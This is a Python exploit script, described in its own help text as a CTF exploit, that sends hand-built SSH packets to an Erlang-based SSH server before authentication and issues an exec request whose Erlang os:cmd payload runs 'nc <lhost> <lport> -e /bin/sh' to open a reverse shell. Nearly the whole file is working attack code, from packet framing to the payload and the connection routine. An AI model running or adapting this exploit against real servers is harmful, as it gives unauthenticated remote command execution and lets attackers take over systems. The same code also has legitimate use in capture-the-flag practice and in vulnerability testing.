#!/usr/bin/env python3
import argparse
import socket
import struct
import time
import sys

def parse_args():
    """Parse the command line into listener and target endpoints.

    Returns:
        argparse.Namespace with ``lhost`` (str), ``lport`` (int),
        ``rhost`` (str) and ``rport`` (int).
    """
    ap = argparse.ArgumentParser(
        description=(
            "CTF exploit: send a pre-auth SSH channel request "
            "with an Erlang RCE payload to get a reverse shell"
        )
    )

    # Where the reverse shell should connect back to (both mandatory).
    ap.add_argument("-lh", "--lhost", required=True,
                    help="Local host/IP to receive the reverse shell")
    ap.add_argument("-lp", "--lport", type=int, required=True,
                    help="Local port to receive the reverse shell")

    # The SSH server being targeted (optional, with defaults).
    ap.add_argument("-rh", "--rhost", default="10.10.248.101",
                    help="Target SSH server IP (default: 10.10.248.101)")
    ap.add_argument("-rp", "--rport", type=int, default=22,
                    help="Target SSH server port (default: 22)")

    return ap.parse_args()

def string_payload(s: "str | bytes") -> bytes:
    """Encode *s* as an SSH ``string``: a big-endian uint32 length, then the data.

    The SSH ``string`` type (RFC 4251 §5) may hold arbitrary binary data,
    so ``bytes``/``bytearray`` values are emitted verbatim. ``str`` values
    are UTF-8 encoded first, which matches the previous behavior.

    Args:
        s: text or raw bytes to encode.

    Returns:
        ``uint32(len(data)) || data``.
    """
    data = bytes(s) if isinstance(s, (bytes, bytearray)) else s.encode("utf-8")
    return struct.pack(">I", len(data)) + data

def build_channel_open(channel_id: int = 0) -> bytes:
    """Build an unpadded SSH_MSG_CHANNEL_OPEN payload for a ``session`` channel.

    Args:
        channel_id: sender channel number to advertise (must fit in uint32).

    Returns:
        Message payload; frame it with ``pad_packet`` before sending.
    """
    initial_window = 0x68000   # initial window size
    max_packet = 0x10000       # maximum packet size
    return b"".join([
        b"\x5a",                                  # SSH_MSG_CHANNEL_OPEN (90)
        string_payload("session"),                # channel type
        struct.pack(">III", channel_id, initial_window, max_packet),
    ])

def build_channel_request(channel_id: int, lhost: str, lport: int) -> bytes:
    """Build an unpadded SSH_MSG_CHANNEL_REQUEST of type ``exec``.

    The command string carried in the request is an Erlang expression that
    embeds *lhost* and *lport*.

    Args:
        channel_id: recipient channel number.
        lhost: listener host interpolated into the command.
        lport: listener port interpolated into the command.

    Returns:
        Message payload; frame it with ``pad_packet`` before sending.
    """
    # Erlang expression; the trailing period is required.
    # NOTE(review): lhost/lport are interpolated unescaped, so a '"' in
    # lhost would break the Erlang string literal.
    erl_expr = f'os:cmd("nc {lhost} {lport} -e /bin/sh").'
    parts = (
        b"\x62",                          # SSH_MSG_CHANNEL_REQUEST (98)
        struct.pack(">I", channel_id),    # recipient channel
        string_payload("exec"),           # request type
        b"\x01",                          # want_reply = TRUE
        string_payload(erl_expr),         # command
    )
    return b"".join(parts)

def build_kexinit() -> bytes:
    """Build an unpadded SSH_MSG_KEXINIT payload with an all-zero cookie.

    The fields are emitted in RFC 4253 §7.1 order. Each directional pair
    (client->server, server->client) advertises the same single algorithm.
    Both language lists are empty.

    Returns:
        Message payload; frame it with ``pad_packet`` before sending.
    """
    def name_list(*names):
        # SSH name-list: comma-separated names encoded as an SSH string.
        return string_payload(",".join(names))

    kex_algorithms = name_list(
        "curve25519-sha256", "ecdh-sha2-nistp256",
        "diffie-hellman-group-exchange-sha256",
        "diffie-hellman-group14-sha256",
    )
    host_key_algorithms = name_list("rsa-sha2-256", "rsa-sha2-512")
    cipher = name_list("aes128-ctr")
    mac = name_list("hmac-sha1")
    compression = name_list("none")
    language = name_list()

    fields = [
        b"\x14",                      # SSH_MSG_KEXINIT (20)
        bytes(16),                    # cookie: 16 zero bytes
        kex_algorithms,
        host_key_algorithms,
        cipher, cipher,               # encryption c->s, s->c
        mac, mac,                     # MAC c->s, s->c
        compression, compression,     # compression c->s, s->c
        language, language,           # languages c->s, s->c
        b"\x00",                      # first_kex_packet_follows = FALSE
        struct.pack(">I", 0),         # reserved
    ]
    return b"".join(fields)

def pad_packet(pkt: bytes, block_size: int = 8) -> bytes:
    """Frame *pkt* as an unencrypted SSH binary packet (RFC 4253 §6).

    Layout: ``uint32 packet_length | byte padding_length | payload | padding``.
    The padding is zero bytes, at least 4 of them, and its length is chosen
    so the whole frame (including the 4-byte length field) is a multiple of
    *block_size*. No MAC is appended.

    Args:
        pkt: message payload, starting with the message-type byte.
        block_size: alignment unit (8 for the unencrypted transport).

    Returns:
        The framed packet.

    Raises:
        ValueError: if *block_size* < 1, or if the required padding does not
            fit in the one-byte padding_length field.
    """
    if block_size < 1:
        raise ValueError(f"block_size must be >= 1, got {block_size}")
    min_pad = 4
    header_len = 5  # uint32 packet_length + byte padding_length
    pad_len = block_size - ((len(pkt) + header_len) % block_size)
    # RFC 4253 requires at least 4 padding bytes. One extra block is enough
    # when block_size >= 4, but smaller block sizes may need several.
    while pad_len < min_pad:
        pad_len += block_size
    packet_length = len(pkt) + 1 + pad_len  # excludes the length field itself
    return struct.pack(">I", packet_length) + bytes([pad_len]) + pkt + bytes(pad_len)

def main():
    """Run the packet sequence against the target given on the command line.

    Over one TCP connection (5 s timeout), with no encryption:
      1. send the client identification line and read the server's banner;
      2. send a KEXINIT built by ``build_kexinit``;
      3. send CHANNEL_OPEN, then an ``exec`` CHANNEL_REQUEST built by
         ``build_channel_request``;
      4. print any bytes the server has already sent, without waiting.

    The function sends nothing beyond these packets; it never completes a key
    exchange or attempts authentication.

    If any exception is raised, the error is printed and the process exits
    with status 1.
    """
    args = parse_args()
    print(f"[*] Target: {args.rhost}:{args.rport}")
    print(f"[*] Listener: {args.lhost}:{args.lport}")

    try:
        with socket.create_connection((args.rhost, args.rport), timeout=5) as s:
            print("[*] Connected. Exchanging banner...")
            s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
            # NOTE(review): one recv may return a partial banner, or the banner
            # plus the server's first binary packet.
            banner = s.recv(1024)
            print(f"[+] Banner: {banner.strip().decode(errors='ignore')}")

            # Short pauses between packets. Presumably these give the server
            # time to process each one; the need for them is unverified.
            time.sleep(0.3)
            print("[*] Sending fake KEXINIT...")
            s.sendall(pad_packet(build_kexinit()))

            time.sleep(0.3)
            print("[*] Opening channel...")
            s.sendall(pad_packet(build_channel_open()))

            time.sleep(0.3)
            print("[*] Sending exec request with Erlang reverse-shell payload...")
            # Channel 0 matches the default id used by build_channel_open().
            req = build_channel_request(0, args.lhost, args.lport)
            s.sendall(pad_packet(req))

            # NOTE(review): "[✓]" is non-ASCII. On a console that cannot encode
            # it, this print raises, and the except below reports a failure even
            # though the payload was already sent.
            print("[✓] Payload sent. If the server is vulnerable, check your listener now.")
            # Optionally read any immediate response
            # Non-blocking read: BlockingIOError means nothing is buffered yet;
            # AttributeError covers platforms where socket.MSG_DONTWAIT is not
            # defined. NOTE(review): any bytes returned may be earlier server
            # traffic (e.g. its own KEXINIT), not a reply to the request.
            try:
                resp = s.recv(1024, socket.MSG_DONTWAIT)
                if resp:
                    print(f"[+] Response: {resp.hex()}")
            except (BlockingIOError, AttributeError):
                pass

    # Top-level boundary: report any failure (connect error, timeout, ...) and
    # exit non-zero.
    except Exception as e:
        print(f"[!] Exploit failed: {e}")
        sys.exit(1)

# Run only when executed as a script, not when imported as a module.
if __name__ == "__main__":
    main()